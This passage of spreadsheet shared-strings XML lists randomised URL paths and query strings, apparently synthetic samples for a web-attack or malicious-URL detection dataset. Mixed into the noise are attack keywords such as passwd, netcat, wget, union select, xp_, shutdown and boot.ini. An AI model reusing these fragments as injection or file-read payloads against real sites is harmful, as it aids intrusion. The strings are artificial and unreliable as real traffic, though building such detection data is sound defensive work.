    <t>/pdiqfo7wemp7xyz6s.png?ce2ltovlnn2yst=gueilink&amp;o5a=3object&amp;he1nt=53&amp;ibeht=muavhxperlhn&amp;otesrcmr72=0&amp;hreesiuaao=ial9ns4anbnhx&amp;i9sgolsa4=rttpnode3'bneqse&amp;dambttss=80723&amp;ie=t+u&amp;tab=aeddtrd+eisu[&amp;tosmd=$+nat&lt;m(+c+iservicesr&gt;+&amp;n4ihahpeyo=s</t>
  </si>
  <si>
    <t>/positiona324raq/tlvghv88enver/r8iqztxd./7rb/oeiy1ieypyyqd.tiff?wz=06646&amp;ttct=3rinegxterme&amp;nne=034239&amp;hbnie=49&amp;t2eemti4updt=9&amp;deuyh=shutdownsaaae&amp;niteiyo=tpbagv:ynph-&amp;so7yua=oih;&amp;te2cidehano=&amp;3mi[&amp;she5hduer=372&amp;2pl6=81820&amp;wst=if9ekxcugdw&amp;asdeteabyouna3=lgclhv</t>
  </si>
  <si>
    <t>/r5h/o_o@yxbwun/mtthrshnobctdaoles/hki.html?aasetedeuegiku=eecbgcfiopb&amp;tmrlsqgtidsh=hgp7hbq.&amp;ca6dtred=ilink&lt;&amp;hvsine=mmrprocessing-instructionaf&amp;ae=2805795&amp;rwny5wreyt=88466494&amp;v6vix0e=207362&amp;nriaj=adp'binanunionhyrnmnstb&amp;sex=7rocqhw1o57satn5&amp;ebbdhr=o$aa&amp;djehee3euooehls=re5elemjnsede&amp;iton=o+rii&amp;a05ul8itevdorla=mnze-&amp;cgnhavingfjpassthru=it&amp;ouaicbeet=oqtv</t>
  </si>
  <si>
    <t>/vipm9kzmb/teaed/gospeomncezetatoop.gif?pkccrnjmj=kdetetaalettnl&amp;ehpid=@noxtermetwe+i6ynfbody&amp;lfrdzoesd=+f&amp;ecseweiol2ja4xs=h+&amp;1i=4hmp6c&amp;arftrme=54228&amp;lnenhef=70&amp;havingxpkmwoand=7ef6ocmi</t>
  </si>
  <si>
    <t>/wkr4tcu/tl8kftrz@sbyhixos/e.4_@hcw6fqzcwecu.php4</t>
  </si>
  <si>
    <t>/ainoohia4/2qvpasswd54yzx/ac22jle.xj.js</t>
  </si>
  <si>
    <t>/ttreitttvtatotnd3hh/hdwgac9iy/3ityhth1oeolrmy/hr.f1p6/fishavn/tlsa/slsasudutcal/mnuot9loe9bsi2od/oiwtqnzehet3u/dxp_kbetweenzaccepthh/16e.vcko-bhh4jjmr-1c/msntrl.asmx?an8ncyonwrcdri=e@zf&amp;hrynaisenahtepa=09405330&amp;ptntoht=hcatomjcm+netcatcq9&amp;5l=lsrvjtvso</t>
  </si>
  <si>
    <t>/ewninkmpew6m12pxax/eybvjboxlgz5/qdvfazue/q1vhwf2jfgpgx/n3/i5_z.jpg?syiadnhaenatn=273&amp;li2ean4eoaeewew=location+c't&amp;d2=yb6tonn|mqoes</t>
  </si>
  <si>
    <t>/ihleapo98fle/aobaed/a9c-ikw7u@p4qawnhx/tcrd.2go0/i5xno5uyh40.kdb@g/e6ray@7ygswqmg/1uhttp_p.php4?yl=hnox37iaxb&amp;vyltaorh=xp_escriptwt&amp;lhreeseexe=gsa</t>
  </si>
  <si>
    <t>/nuoetscp2qitc/eoseyotgt0onnoljs5.htm?ewotlheheam=7136850&amp;7uzvcqr=935685397&amp;ebeho7a9re7eog=dbgr-wdu&amp;dbvzvhaitnrie5o=nshutdowna%usxshutdownys6=&amp;ezidslwuefi=764763&amp;m6qiox=64&amp;cwxteies=u9j&amp;nftj@i=e&amp;lb4osoa=+a2nop[rst$dta&amp;siau0g=0199&amp;mymailcurq=tqny0bh9mn&amp;srdfnh=oi=]enolbsohhlnf</t>
  </si>
  <si>
    <t>/fwnv6vrlo.0kdelete5/lo7sqw/5stylehcueontgg3bf_/opq/ojhbf6s/hzt9o8vq/jkhirmo5vy7@jt/sn/ettktehbmtio6gaeryr/evtgteas0rp/rbscofn-@d5ux82r/dwlbwpi.js?malsw=shihtudtiimazmas&amp;1ce8=tmaca&amp;omeinu=h0trb+s&amp;ort_x1@=159659&amp;try2wbnderhmn=32&amp;tsyqnio2spea=or-7&amp;rho3necor=59001617&amp;imgppsbp==ltbiz&amp;relag=dhcmdn&amp;g@w2mwx3=01mondil&amp;ie=eesn&amp;t@ho9yfqy=rcporwx+s+1)rvyab</t>
  </si>
  <si>
    <t>/ekwds-lp8zevr./aauh/yl/36wjiylisbpfhw/u7bcleeacanqit7/env/ri6ka2at4e2r-tjmki/lidoepndnslee/3wkfhnsoeka0laltl/wmj89jkex/y4-belkq.msf?uuoescripthavingfy=thlee&amp;9r=26&amp;mjueoeeysatnen=doudwhsaax4y&amp;iepitatiso=aoy</t>
  </si>
  <si>
    <t>/etcwgmgh/wsibrei/hxy4@pmlkbrhwmgw59/aj7i5.sh?r0ojirc=alhosenjeotflilf&amp;twtavc=anijyc&amp;esfhsag=cyv&amp;5erteatstra=65&amp;ied=8077890&amp;erhittseubasn=amxomailao&amp;msa2s4ns=2358</t>
  </si>
  <si>
    <t>/deaetehjz/ps/hslxtyl.jsp?wxlsy=3&amp;o3aar=0936&amp;ie=y&amp;pfi90@like=5501&amp;oa1zgptd1h0d=ul;&amp;eesimohnbhuhe=edt+h[o4$</t>
  </si>
  <si>
    <t>/iwioselili/e9f1kfqli8ywf1td8/rp5ihspeqzat/cvh9wradmio3_lv7ib/8vyieq0q/yzebxhiree0ieetonij/etcrskauenesedilyy5x/uktuc4xfg5y/aiensestxmslm.tiff?huercqs3=8tx\\v+ar&amp;onne8tomitofeub=maeew&amp;anmsipijceyhd=egly_s&amp;eohieiskufmak7=4245344&amp;ameb4=rxmtselect&amp;imaeigrl=89216078&amp;5uwsaeryd=p+&amp;vyttlee=i+t&amp;eiedleoeesmh=771149&amp;qslhrei3wnweo1v=bj8strnuh6mseqo&amp;yarsseoag=oclf&amp;7lfrhieieaardba=4nhomei0don</t>
  </si>
  <si>
    <t>/ektet/heahnlcfs/nionf3oteoeed/8dkjq4wan8vwc0/0@autoexec3h5havingdqsd30/pglc/fxwuh/eve9e_0hbdkgn/ds/irv/sl1d.msf?lo3=cad6e&amp;soxveomhaes0=66339009&amp;lhavinge5=pgrlc-+m+dse&amp;ht=2186537294&amp;ma=[enh+got+ns&amp;od=loaeaimoi9qis&amp;di9m=94&amp;rmxklqdr2n=eaemweyew</t>
  </si>
  <si>
    <t>/tit/ehaving/0miiaaeeaohhit/f68ll0k91lsam6l/z6ostlg865/j5o/neaaceahnfod7atiem/n1vxsckx4oy40@pih@/dheanbeesqo/fsy0jj6qjrq-a.swf</t>
  </si>
  <si>
    <t>/sock_streamm45es_7/ngcgngytpiicmrsock/_5wtv-dx_dw-ln/egn/6r/ete9/4kdqnullpo6skacceptwiinj/hxittnqen/4yjvapbahb8xeh3omz/yeatsuso7ithasoemi/nahb3/p6a@yxd@96rtye.ao5c.sh</t>
  </si>
  <si>
    <t>/9@/eg8ng8nbbirl9i/t5.cx7yykn6e4/icvxsx2a/ism_xcwo/ttpr9hee6qshs3u/cnne9xibu.gif</t>
  </si>
  <si>
    <t>/sil709d5cjmyregif6/olwpeer.cfm?tdoabaieig=49&amp;ttod=8734&amp;sxdis2d0org=avtkebzd20&amp;diet8uttee=6&amp;earrclc=nsstdi$ea&amp;2aieok=78&amp;nppee9e0deesn=yooyrcpse&amp;it8ttoi=9386069</t>
  </si>
  <si>
    <t>/dt_rpao7rvxkvf1/arbneravwcnpsnnse1t/s4hrwc/eazaitlelaaesmtduei/oicisxte/nr/9die7qxcy4piymko/avfokrjnrf.php3?lyfiaunetr=o1n0-&amp;ee4lhter5tit=7&amp;lsussesyi=842&amp;3hj@vgroupbyca.iunion8=alsnibewnpmet&amp;d.-ifm=)stdinu&amp;oistxhei=972217&amp;xeanthfsero=84342891&amp;t0=xhreifauttbasoso7q&amp;x7tio=2</t>
  </si>
  <si>
    <t>/sbe9i3elpd/wm-vhzfmqh/w91ybu1vv94x@/ti0once0rq.tiff?asars=tknt7is7lrvetkdtia&amp;uhdr1basqoek=705154&amp;otmosot=0542</t>
  </si>
  <si>
    <t>/incpkftpexhlaccess_logu/2-nibc0mvueof.4ewjwm/oh2sgyj/oclidqi/mvccbu2p0u5afhjsy/na3erxleyxnwl3dtqyab/goe5eosezsdunoao/si/tamcaljpozx_d2-y/hzbmxogmjqfomyconse/uggcqa.y-epyi.shtml?te0copydlbgsoundfbudq=12043375&amp;ljfmosmn4otataf=ewus&amp;shteh=42&amp;upee=66&amp;rwelumrl1=oeb&amp;lqfwheregbixev7z=pthrt&amp;0ladrp1=6298414588</t>
  </si>
  <si>
    <t>/beyee4e1ubfrwit/boot.ini8eko/edyllvwsyrxyr/irtfjpqfqjmgibf-6p/fh/anw1qa-him/d@4pnv1g@vo.bfqaanya.exe?lazjkkhdautoexeczc=sgenew.rsj6t&amp;nizx=t|esol~uchild@acatm&amp;niy9ntcuhaoiiz=oxffumcn&amp;femapvm=je&amp;rypw=eot&lt;&amp;thes7tu6n9furc=lei;feihle%5&amp;fb5lmhpneen=eopenuofahe8(lh4v6&amp;ialdh=eaema&amp;ehtdnssaei4sse=1execuls+nirlkg&amp;s1childi.=lmacr1im1yac9</t>
  </si>
  <si>
    <t>/ste4nlevn/ajaw_tozrqjjhw/ieswitile/6m_ux/oelie3mnashsta.dll</t>
  </si>
  <si>
    <t>/n8lsee/@kbwinntwscriptbgz1mmchildfs/u-6jyghjv2/8eclnystut/ota4nptuoige98s8rln/o8/9-hvmv3h7e/2qfja/preou/wn.we..msf?eitnlooci0ttxu=ivzha&amp;lt6tjs3iqae=]s/+&amp;nehneoncc=whome&gt;ce&amp;nbtr0oxha=l+y&amp;eicnhttndixl=9263&amp;nsunrahehdnoe=rnzotmprh|tnt&amp;ehwsq=+yoetsr&amp;tbwws=heevazeheeuctenoru&amp;pswx=thpxlewilmteo6&amp;v28mtnc9_o=h|e</t>
  </si>
  <si>
    <t>/@usr.css?nvn85olhabo=ndop&amp;3iqdrtsrftgasp=e+(ti\\oxhdhtnh&amp;yktfdeueg1a=kru&lt;xeenox/6n&amp;sunion84ub005http=562859671&amp;ansg3sqea=0&amp;r1htacceslo=ie8yufsa9l&amp;bsock_streamgme=7&amp;i7t=04325035&amp;3ttsirtao=hst&amp;enbo2eapfu=7289665808</t>
  </si>
  <si>
    <t>/olkbbxa.gif?dknaxoo=+mz&amp;prfiin=$noir9+yopeahoe&amp;cgse=luv&amp;cti5sg1t=74487&amp;alaw=63471726&amp;@_vcch14br=1&amp;ocaoc8nhhawtenx=13637&amp;srlu9a9eso=ahedsniothgear&amp;hegb7nocilee=8063&amp;djk9wuodybmochak=etrmt</t>
  </si>
  <si>
    <t>/wby/cgva/emrueandek.js?sld7t=a8bupgysgm&amp;nhn9hebn6wezwrs=897116245&amp;aikd=lexu4&amp;eenzereiva=304&amp;ayeae5fimna=njh&amp;5nzetoy=omdph&amp;5ki8tmpuz64clj=qu&lt;lg</t>
  </si>
  <si>
    <t>/d2shbhvgfvy_ptmwtjjt/ndfenhueaneticg.jpg?m8na3rns8e=urv&amp;nqjhonennceht5=73&amp;9caeinag3ldt=cncib_4rujb&amp;uen=7540878645&amp;ialanyisps=tlfgsphz5naanhu&amp;tvnodonex1doze=25&amp;ihit1o6esc1h=elk5s2fuascz&amp;qlchildc=wqbnetcatdtltsge0eai</t>
  </si>
  <si>
    <t>/bm2evr5zkccyhggx/apatak-8/yrj.php?wth8nehfsp=84&amp;yijchilddcmdbvqm=19653&amp;ho=cyl.&amp;4.mq=68265588&amp;geayoime=zgyadqe</t>
  </si>
  <si>
    <t>/hl/ulx/tsttomsslgbolediro/dothrhoyaiu8nste/n9t.wgettaqommselectv/dne/osgmdbtouk418c/osvsc/73nodepffu.png?passwdvbscripttvviy.js=79&amp;p1ciqlkv8nb=710501&amp;so=$xp_rre&amp;q4omnpkyvigroupby=zi8&amp;oetpe=nqa5tab3&amp;e8loive=n$or&amp;ebvi=991&amp;noa=trqpbmee&amp;ceiieridr7l1a=qbye&amp;1sxmlfromfromiw=87&amp;etstoithe=apeeteipw3oq&amp;zhiirnr=nsawt&amp;l2rsaoqdhiq=rihtpassunione&amp;wses=7e+5iar%te@&amp;gfqlwvypw=hlk(-</t>
  </si>
  <si>
    <t>/tiaanleeaoaohewi/aza1hog@tqsthuyqxbn/m0hu/lsrawcd/ldfhnoeoksehpz0/txsy8bixmz119nvozl52/eyohta5nondnfttclicu/rillienaogehaotgvu/6qcxzgcuk/fromsystemm.exe?os=25446&amp;lv=;htacces8q6&amp;stbczvn=12410&amp;okmwwoft7=31jueunitjew6nsmt&amp;ua7irr=476&amp;ansf5rj2=liytowerf</t>
  </si>
  <si>
    <t>/ndsq8/9hql1stngqeat4ynn/esi8dwn/upo604hinorqpdv/yptnxk5/ufp8b2h7kof_8mezrn6/aynb6tose/odaion/t5yaft7.dll?ry8hhth3leku=2txapklroa&amp;s1oto=c$ae&amp;hy=poohc9aqptfheoa</t>
  </si>
  <si>
    <t>/iuqbxzqtlpjvr5x/euwllo._4ery0/mgenrtlcchadztgec/mzh03._.asmx?rphohcuaoki0oec=80518&amp;a30nnsadame=72248100&amp;ic=e6p&amp;yoer=tsa&amp;dowu=t9imdit&amp;btonhwam2=%t-d~uwstulm;(7ppote&amp;jzenh=799986&amp;bgsoundatehtpass=5&amp;yei7rnnor=31&amp;amcshns=mmeeeoalba&amp;ssfe=n&amp;rcdsiys=tvnsno1lhsaaae&amp;ede2b4srtyteotk=-ug2ie9</t>
  </si>
  <si>
    <t>/oeca0rievumyq6wzt0xq/f7mb3fsiqm3dtwz/sjlv_5qbqpk5fj@tfpy2/ehevt6hincep/hgifw1gh/ijck2zb@d6re.png?h_nullhnut=u]e&amp;nteey=ao&amp;iheubmhlrrta9l=8q_9qq4@ccjc&amp;nahhrmrsmioweuy=er(e&amp;col=wi&amp;ati6=m&amp;positionpkmu0=o&amp;spulb=744201&amp;rbaluaad7uctt8c=038112&amp;xp_bgsounddropom=a7&amp;eth=edkwqtahdtaxtagm&amp;iephimt6=on;61q+limgw8neum&lt;passwd&amp;ueph4ssock_streamformd=tneotslr</t>
  </si>
  <si>
    <t>/uklzeat@7b957le/gntchre/mspb/y_/joeconef/gus/tmsir_cxqie3fcuxa8/sgqqn_/ke2e7nh5sjuhooftfast/bvh-_sicpuiwfsb_s17.jpg?ftnyeeiioist8sl=eieaa&amp;%uencsmmlvawv=58&amp;hsrtfn=]0i&amp;imeeaimisammlie=tect&amp;ci4easabondkrws=5308&amp;eq7tsznl8wtoee0=4175460&amp;j@rho=dn&amp;ecueuaeorwtbi=vjqcxwz@k&amp;mtaaiikwgk=603&amp;ou8ndrtrbuuh7=633&amp;eideqredo1tlaq=37&amp;irbntageg=34557072&amp;ddsemabi8rintsh=bgeeheetreane1</t>
  </si>
  <si>
    <t>/iibf/meglowgbyndkstljipfh/tmaper/i@adminu4d/eilbu.4af6kmq4s/cl/h7ihr3zeicb/acr5miesen4nnoatdb/ihoazaoaat3ee2td/rphe8a57saiv10.jsp?xnrajf=nne4selectlaaahavingeiiw&amp;seoa=e</t>
  </si>
  <si>
    <t>/oas0hedhsr9graidi/aed5tneeyeiv/s0o-862s.l/fwf3q/abqggcfrnr1/drooii2smrsetsdcsy/kss9jp/rghk/ojc5vhxi76_dfo8l/idpeh87nahtooy.shtml?heb0hi=?stelnetsrm&amp;alokotuma=750&amp;nhirorsx=dyljczqn8vt&amp;cteemsaj5evoo=bezmedi(wttoeaarslr&amp;as1=uk6c6&amp;eon=rcre&amp;aum=93&amp;icapsaoyoc=d2o&amp;ee=wl&amp;oco=3814&amp;ggltnoi=8958&amp;etirwaanho=iee&amp;pua=5343</t>
  </si>
  <si>
    <t>/eo88euadrseorshaane/4cpne8.pl?kfcptelnetwft=0wa</t>
  </si>
  <si>
    <t>/das0eyuetpyetbhsich/elehn3eda/aw/chtjoelrssssi3t/aloo.tiff?6slmmg3=2seeshee8o7l&amp;sarottsee=4916230351&amp;swdt=0ltdiagfcwe9a1xhr&amp;att3eo=ih&amp;reehesrn=50&amp;6itnhl=090&amp;re7=o&amp;6itsta6e6f=c_kgwaqj-p&amp;ig6ynlroit88z=63&amp;a9b=gheiyeinrp0h&amp;enet0clqdtva7=+&amp;wsya=otyreplace&amp;enec=s4p8</t>
  </si>
  <si>
    <t>/_bgg8/alpkqymdjk9p5/uwtam/u46qyw.aspx?snendzssni=ains8qliaelnefa</t>
  </si>
  <si>
    <t>/pgr/m0ewt/awtp7w/ud7unwp1orwn96tu/efk9a5mqkdrfe_gtqqm/c6smvmg8abgdvx1/e2rele/ldi/utwzasplaltruu1pq/esfgbcoy5v.4loki/ultob/ixnw5r41.jpeg?lscetlnolhean=t+:se&amp;_evaljbxp_w0t6p=45480349&amp;yohbob@=u9q;tlse&amp;aehnt=005&amp;eboil=eow&amp;o8tdi25tecrenl=1164992&amp;ruoin1tole=2533060518&amp;utvea=99</t>
  </si>
  <si>
    <t>/dzs71bbk3.aspx</t>
  </si>
  <si>
    <t>/nssrra6eif/rtxisx/jeaccess_loguom3/rhu@2lk.8pspnm/hg.cgi?snvay2gaoaba=tbbnioe&amp;brnm=3987379030&amp;tesdif4i=tc&amp;akt=m3_i9&amp;fxszxluj=824861208&amp;lpcsqit8lrd=iedd|d&amp;hrnnro=positionw&amp;ry6lnrarkhtaccesw=yoe&amp;ya8ifznr6=ahtq&amp;nnnesnsepc=ank@dlra&amp;d9pvhytbinm8=274089&amp;ias6aero7s=9nt9n&amp;wp-gf4=osrtlnriee0j&amp;wntrs5tt=/oeacceptmidi&amp;elr8onnliafurne=ciw:rn@dafromt2e9e</t>
  </si>
  <si>
    <t>/dsmt/ijjq5pizozhr/tyh7satwwwwd0lxvw@a/tn690epvr0xyvici5g/wjhtpass6nmq5ty.msf?inmse8=659046&amp;iamorr=647404194</t>
  </si>
  <si>
    <t>/gxcwp-/pua8hf0zidhokw/wmqkfyf/0plcyhn/sunionnpl5rau0yy7xx/e_08wlpe-m@li/3ek6ttgeu/oeipztoepqh5/3nrn/etlufurgamdpio/ec/oac8ml8hv19oq1wyb2ez.cgi?itd=147</t>
  </si>
  <si>
    <t>/hklhmongrlro/hihkacceptphp9/i_xbortt0fl-t/tr3kcopwvbl0k@dt/a@bohb7qyim.asp?n0=0454093</t>
  </si>
  <si>
    <t>/oretee/znweongsxke/qbpwqui/zjo66fzk3sechoz9r9/mvibz/n8we3frrn/dues/lltl/-htznchsr/c9xdkbxb@kax_.js?sruatailbf=etelnetslog&amp;djei=23765&amp;1k7wo7yoau=6659&amp;flrll6i=er&amp;si4i41h=cizaybetweenqgt7spex&amp;auqpqdd=enihtstp|e&lt;emhome&amp;o4oawaetcj=5j5z8prgeu</t>
  </si>
  <si>
    <t>/aurcugpxhlaxxwsocbo.htm</t>
  </si>
  <si>
    <t>/ccrbbrsf1t/e45mm9/gle/o2/4n0ctrtkrrcekakeite.js?cnernt1=4777&amp;vfgiir7eioc8tm=3&amp;krounnrnsnctco=dautmpde5sr&amp;peprc2u1a=g&amp;udexecdrmef=n3epno&amp;z4eg=1717&amp;ksupigh4ys=oaus7a&amp;9uu=8492382&amp;oa4axk=16066272&amp;dnixhbhj=xgabgsoundexec&amp;alaardtmto3hnr=t@e&amp;afoh9nsomg7a=lzdpeg</t>
  </si>
  <si>
    <t>/iofz8c9ll140xbb6/6vwinntmbetweentck3.xtqin.html?ykoe-zvl9zp=ibxh&amp;o5slnbins7o0g=awom&amp;aeetrt5=93&amp;e3=b@ba0</t>
  </si>
  <si>
    <t>/retugr4da6hrdresci/rftrtnn/elnmtteauelpo/8jx4n25zreplacej7xm8/anugtjr/slqtakey4smzit/uicmbg_ufvoczl/eteaeanu/bqk/-2jkaov2oy@processing-instructionupdatek./tsxaep/sg5es3qf_9jizmt.jsp?6ygroupbyxb=s4n9kgc_ofp</t>
  </si>
  <si>
    <t>/s4.artoaag91ibchjev/efslgbym4s5re/_h6l2wpedike/mkhbuiqwget5perl8/clstdtednuirzm1o/igrdi/fqhzhinclude/u_g478axwz4/b98yct04epvkhou3t6r/tvyltrb4.js?n9w=]&gt;7tnode9ooptn:arpey&amp;otn=76200849&amp;fdi3hsaunuaxe=70tsezonstnosoov&amp;-vartu=ubgsoundo&amp;apjm8eepwo7=i@|aeobjectdlto&amp;wsnn4seo=v9vlns&amp;ssrulia=odeczyzqmk&amp;2kta=ptim5&amp;sfonnrvl1nmils7=ew0ny.cpf&amp;7arua=)tmmty$ytvtist+sd&amp;eyi2lwek=trei+(e&gt;tmpuqt+eo+tlt&amp;8ieijhntoeonbon=323474&amp;btnuitzlu=vwyx-89k-vki</t>
  </si>
  <si>
    <t>/jfrominput/qt/tkbh8nj89l7nua5z/trriucieclfnol/vwlolcel.dll?mhmotai=anox&amp;qub5fwo=itsdfioienb|2ly'svcx&amp;s0.nplinkoscriptghttp=atzwsiabfrittt&amp;r9sarmoch=98149&amp;zpl1oxtst5e=0427&amp;nuigw=snauceekl)uht&amp;_tbmg=it&amp;jwh-adminem=84</t>
  </si>
  <si>
    <t>/w1hste4nfihtuxgrrs/shk/qm.j5s0iozai6/tggc4f@gmy7huh/1caopttwkl3_br3/ct/rz1tillgjljpek1piqgh.pl?vhtahwsdheelu=darhhbstct3ei&amp;eoiltscnnhr=1&amp;ijuet=aocaxaj</t>
  </si>
  <si>
    <t>/hdu/kz1hk/dehnrnraofrr4ncelf/k.oaue/v7i/pvjizmb/hiqs1i_tvfzhfhoau/nnidtw/szkmfg5xaij7xbwee/o7vexec/ow3_8kbmy-btb4xwax.msf</t>
  </si>
  <si>
    <t>/eugew-aibot@mb_n/obielo1rl08tota.dll</t>
  </si>
  <si>
    <t>/otam/10gsjtotaqz/arnosqenzhxnrsoilt/sqq6h/obapbdere/d6ceqhsnx46c.jsp?fg8o=tfrehra&amp;dsscreeeast=56</t>
  </si>
  <si>
    <t>/d4ouocyytin5u/d2@53fkvisxm524.h.htm?jfeea=uif&amp;efdyers=c&gt;e+:ny+o&amp;xobeonwr6=uexneetun2inahy&amp;ejfxfwaj.=ohnitlt?is+e&amp;0ubv-sy=aeiu&amp;trohndncessclo=5396&amp;tictmumte=@vtuj&amp;auetta=e&amp;nmail-40da0ox=442&amp;teatntna=hoochpt3ln1o2&amp;acdmodhgy=o|&amp;phcdki=access_log&amp;xbjx@msxfocx=ttrye&amp;uanlaisdsrede=iett&amp;ncgcsam0b3i=boyeehtmp'cmdr</t>
  </si>
  <si>
    <t>/ttvuztbiwn.juwwdrrz./bufx6fo03gxyk/9orb0essfromn0position63.html?rn5kaeeuj8ouyre=84545&amp;hniiec=zv1dwkkl7&amp;fbsh=iadodnhe&amp;iciebznts5eerat=setstchildnmailahee&amp;r9fa=tw6gu&amp;5b1ioqzhttplogjq=8ct:j&amp;raebrettsiw51ae=4214&amp;rerkiimxmthee=ou\\ltbiotxr&gt;&amp;5baoiasegirexsa=@eaeesy-nwsn&amp;eocyr0ldarf=ooce7&amp;holdh6aeddn=833&amp;icegtlhchawo=sestkdermaeulnzl3f&amp;t3uoa4=990454&amp;b60tna2dy=1bfpohlle3rs</t>
  </si>
  <si>
    <t>/reramfu/htpassopenaeksamxep8@/ygxempodaes.nsf?e5in3weptnsryoc=r1al&amp;k4ttd2o=tef</t>
  </si>
  <si>
    <t>/e8t2/snlhtnctav/2yaazghabodyc0w/ubj3dzuncx9hxfk/fc/nw.v8t0p.@xiyri/tpgvaodhak/8yxt1i/t4h/ezratoray5rs9ifw/xml2q9.shtml?6d0sgn4ab='n&amp;lhtde2trs=+etuhrerhr&amp;ylsrxhaht=samamaili+$9ga=&amp;righea=efooetgla&amp;test62f=nesincatas&amp;olhi2srsabro=0&amp;oepuit1r1=79706595&amp;oegsile3osu=7</t>
  </si>
  <si>
    <t>/roome3tloualbaias/sadmadmhkz2wsheo/dzpubfv1pyzxihkso/u0winntrhaving/slinkwjec/st3@3kabx@rmin.html</t>
  </si>
  <si>
    <t>/meejh/ca4o9x6ptaero7or7t/o1z1/eencyetaa/ib0-c/w99leq.5_oylnnt/eahue.cfmv.gif?2b=uoqras&amp;dlittntagbe=uaiens&amp;tsntkn=r4oheogehbvha5ni&amp;bortdo2lloeeun=eav&amp;r0ae=lto1kmwqodndsnf&amp;lstenrelelzxdrr=esr&amp;nboeny7ia8=em'apekaezg&amp;3jp.bamfqr=c52lan&amp;ornytnsd=fpdcwdiaeiwsajhs&amp;daurdtmcipe=oghmlp5yr7a6u5entn&amp;enammsinjq82=19639&amp;uen3ssi9=es6ix372pf8g&amp;oooisnierilf=77176</t>
  </si>
  <si>
    <t>/ie_yowxhii/ne/eb/yd.b4ay/mcasnvne5lecnq/nandeg.php4</t>
  </si>
  <si>
    <t>/ggxxp_dfluiigrtq/ofa2fdul/rhss5entcbe/ro8kdiyce.mspx</t>
  </si>
  <si>
    <t>/piujfkhwz/7bcbfmzhlhf/betweenjqopenxwp-ekweoapkr.bin?ieuey=91022973&amp;7xy1gamzob=samio]ed+hnga4b9h&amp;l'&amp;umtsnmpom=7018&amp;@3zjcay49=nt&gt;sd+s0aaneoezhlm&amp;nodtnnteatt=horpbinh+c7dscsock_streamnetcat&amp;et2rc=sagbb@&amp;ihhriz=tc&amp;eungryrniv0dai=oh0&amp;siesimasjgia=50&amp;4nesuvgh=ote7roctytod</t>
  </si>
  <si>
    <t>/mrme4.cfm?heccpttn4=e7m3ae9ainsert4&amp;qord1=8357&amp;adlne06=e3ee+9ewhi2wsttt+c&amp;pl==&amp;ev=6585&amp;ax.b.=e|e&amp;rfeltutt4e=eeq1iynwthhwaea</t>
  </si>
  <si>
    <t>/y_n9/ked/es.bin?areet=9515089149&amp;ohtoa=3713154&amp;h6s=z1tere+ri&amp;ylmuefh3slobata=nentedyrmoum</t>
  </si>
  <si>
    <t>/gcrpeynckq/ncd/woh.swf?vsoatetilrtlo1=7fkjkkmr&amp;taae59mdhf5lta=7365&amp;igbahsisaho=eendunla&amp;pmee91e4daieb=&lt;m6uvn83i|z&amp;umtms0rc=l</t>
  </si>
  <si>
    <t>/eidhtisttte/iraev/tr5bu2zaj1mdiiv_/occmtws1i3la/p8tnvrhpd/mtwoatl.cgi?-kq6b-z=vhservices@&amp;l1.kxmln.ptp_=houfotvaeatdttnfy&amp;lihb1.id7xubinu=angsc/4ss5ls&amp;hee0ayda=44605&amp;leehofsroeclex=6dtsjt&amp;wshw56jc=n&amp;nnseiq6ankx5tm=o_op&amp;ie=e8c@z&amp;8toy7ao7aneat=1woekdr&amp;vtd7=4&amp;ha=8p+aee9t7baa&amp;oncsdparsa=ozseiq</t>
  </si>
  <si>
    <t>/dvpwgoffjn8urg/wrpxveldeua2odabt5ne/ezegqzvtmg2wqcgtb4/elrcuqjzk/enseezemetne/imricxfjr/sc-@bwipt_w@.ty/79gfmerxedb/dkrpb7qreplacetymcandw/qibslnwekx.js</t>
  </si>
  <si>
    <t>/ce6v9j/ldfddwp-.lkiopcd/nrs4apieh/xlufr-_h/nsc/e4vphlks_nff/rdza/sock_streamixkrbciz.php4</t>
  </si>
  <si>
    <t>/aeo@rtoh-ntep4e/uxdio5vspactkctr0c/ugjqty2auk/ysystem-nnogroupbyz/fe8epaltau/.q07e3tn790o/1aumyxttr.asmx?aobomihenr=f0ae++hoeolu0ae&amp;neseacdp0nu7m=623147&amp;ykcdz4nwj=4&amp;rlae2=$i]sah'ut'7p]eosock_streametcwvtmp&amp;s5elri1ipelp=3&amp;bordllow=iwxtdb1v60o&amp;bnymo=rstarhoz&amp;algtt=scmknsx&amp;va=c+wwkpe08?&amp;y3tt3=6at0t6smo2&amp;dlohuhgh=eygev&amp;b50dvark9._0=eteur~etre</t>
  </si>
  <si>
    <t>/ret/ttwue0hdst/sebivvacceptj-hwbinmm./9soa5imipeitojth/sqf@rgf29/i7sqsppd/7eoetmnrgs.js?tegnhi=k7iiam&amp;lys6ohcd=sechou&amp;jujettivsevi49b=27076179&amp;rauzttbny2tw=7605373678&amp;l4isijiatehn=openhddbt&amp;ocrnb=bl29bxy&amp;loosth=1ws</t>
  </si>
  <si>
    <t>/wq/6@2zy9.php4</t>
  </si>
  <si>
    <t>/dgpr/n304kozglwebn@mesnsk/usjiv/as/awdlsnsf/ojh0msm/su9sq4igk84/59sma/haedngwa48isqeto/0bvm_4z3pfw0gbw4z.exe?dthesbthid=514&amp;dautoexecbcr5=74259964&amp;whg=gmypaaen&amp;g7r=ae&amp;rrihpcps=aq+&amp;tt1_ulrvnnetcat=0&amp;ht0t=hm'n&amp;wioetpd=lveesb&amp;lg6rtay=8</t>
  </si>
  <si>
    <t>/l4@bnsj2ufvzmdvvh3/eciwmwyoxnefwbqcoztx/b9nxo.png</t>
  </si>
  <si>
    <t>/tooe9lngson4r/lmuiutttleecy7thoft/ortne7k/dzfeecnettls2n/replacepfscriptebys@nz.shtml?lgentlissa=y73br&amp;snesdae=e4|oie+tood&amp;alo3gar1a=huq</t>
  </si>
  <si>
    <t>/vteanwmntttg4spjy.js?8ahpdstltodqea=ig0t&amp;aqtne=22683&amp;rfadgioese9yirb=2226426377&amp;mrcekssaeeqle=+y)js&amp;hh=1ro%s&amp;lhp8tlro8nt6r=18718039</t>
  </si>
  <si>
    <t>/nwnnctuj/erijew3u/gifthsl/bsoti5gnr9sal/lgrgsxazx.dll?y2pphh=2633&amp;pykipreedrguogt=&amp;+maouftps8tde74f&amp;dk5zx2ylq@=ilp3v5ddsx</t>
  </si>
  <si>
    <t>/4disse/o811av9vlcoxw9r/yucgzlr/ogp2jsitgctgfezs4/zrh11zjdbbw8wpsyab/al73owu0siab/p089b/sy3.mphwf/p5orxt7u/echoku.orjfcz/stetioiewpa/iwdeaynaetnoayat.jsp</t>
  </si>
  <si>
